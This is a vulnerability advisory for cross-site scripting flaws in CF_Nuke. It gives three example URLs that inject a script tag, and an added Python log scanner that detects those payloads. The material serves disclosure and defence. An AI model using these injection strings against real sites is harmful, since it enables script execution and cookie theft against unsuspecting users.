source: https://www.securityfocus.com/bid/15778/info

CF_Nuke is prone to multiple cross-site scripting vulnerabilities. These are due to a lack of proper sanitization of user-supplied input.

An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site.

These may facilitate the theft of cookie-based authentication credentials as well as other attacks.

http://www.example.com/index.cfm?sector=news&page=topic&topic=
%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

http://www.example.com/index.cfm?sector=links&page=links&cmd=view&cat=
%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

http://www.example.com/index.cfm?sector=news&page=read&newsid=
%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E
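
Added example, not part of the advisory or of CF_Nuke: a Python log check that flags requests to index.cfm whose topic, cat or newsid value contains HTML markup characters after URL decoding. The combined access-log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
# Added example (not CF_Nuke or advisory code): flag requests whose
# topic / cat / newsid values carry HTML markup after URL decoding.
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters named in the advisory's three example URLs.
WATCHED = {"topic", "cat", "newsid"}
# Characters that let a value close an attribute or open a tag.
MARKUP = re.compile(r"[<>\"']")
# Assumption: combined-log-format request field, e.g. "GET /path HTTP/1.1".
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_params(target):
    """Return [(name, decoded_value)] for watched params containing markup."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/index.cfm"):
        return []
    hits = []
    # parse_qsl percent-decodes each value once.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() in WATCHED and MARKUP.search(value):
            hits.append((name.lower(), value))
    return hits


def scan(lines):
    """Yield (line_number, hits) for each log line with a suspicious request."""
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if m:
            hits = suspicious_params(m.group(1))
            if hits:
                yield n, hits


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Dec/2005:10:00:00 +0000] "GET /index.cfm?sector=news&page=read&newsid=42 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [10/Dec/2005:10:00:05 +0000] "GET /index.cfm?sector=news&page=topic&topic=%22%3E%3Cscript%3Ealert(\'r0t\')%3C/script%3E HTTP/1.1" 200 5300',
    '192.0.2.12 - - [10/Dec/2005:10:00:09 +0000] "GET /index.cfm?sector=links&page=links&cmd=view&cat=7 HTTP/1.1" 200 4100',
]

if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE_LOG):
        print(lineno, hits)
```

A hit means the request carried markup in one of the three parameters; whether it was reflected unencoded still has to be confirmed against the response or the application code.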